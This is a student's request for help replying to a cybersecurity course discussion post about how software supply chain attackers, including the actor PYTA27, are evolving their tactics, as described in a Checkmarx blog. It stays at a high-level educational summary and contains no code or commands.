Over the last five years, industry has seen a rise in supply chain attacks, and in a lot of cases these attacks have been targeting the code base of the targets in order to infect the software supply chain of downstream customers. The most notable of these attacks was the one perpetrated against Solarwinds back in 2020 that infected thousands of clients with malware. In this discussion, you will dig into the findings of a blog published by Chekmarx, a leading vendor in application security, that highlights the recent evolution of these supply chain attackers.
 

 

Instructions

Read/review the below blog article from Checkmarx:

https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/Using the discussion board, create an original post answering the following question:

 

How are supply chain attackers evolving their tactics, techniques and procedures (TTPs) as compared to previous years?

 
 

Respond to one of your classmates original posts with thoughts or feedback on their answers.

REMEMBER: Responses should be professional and add to the conversation. Responses like "I agree" or "I liked your post" won't be counted. Try to add something original to the conversation or ask questions about their opinions.

 

 

Need help with a response to this post from my classmate.

Ryan Patterson

Fri Jan 19 @ 12:18 pm CST

The evolution of supply chain attackers' tactics, techniques, and procedures (TTPS) has been adapted in recent years, detailed in this article by threat actors like PYTA27. One of the major changes is the shift towards more advanced obfuscation and evasion methods. Unlike in the past, when attackers might have used easily detectable malicious code, modern attackers use complex obfuscation tools like Pyobfuscate and Hyperion to conceal their malicious intent. PYTA27 has demonstrated a progression from using plain text code to using double obfuscation techniques. Attackers are also using legitimate-looking package names and descriptions to deceive users, increasing the chance of success in these attacks.

Another shift these attackers have employed is multi-stage attacks and targeting specific platforms or software ecosystems. PYTA27 has focused on Discord users, employing two-stage attack processes that involve downloading additional malicious code from a remote server. This signifies a departure from traditional one-off attacks. PYTA27 has shown increasing degrees of OP Sec by routinely changing their usernames and package names of their malicious code. This underscores the need for security professionals to continuously update their defensive strategies as discussed in last week's assignment with the application of Business Security in Maturity Model (BSIMM).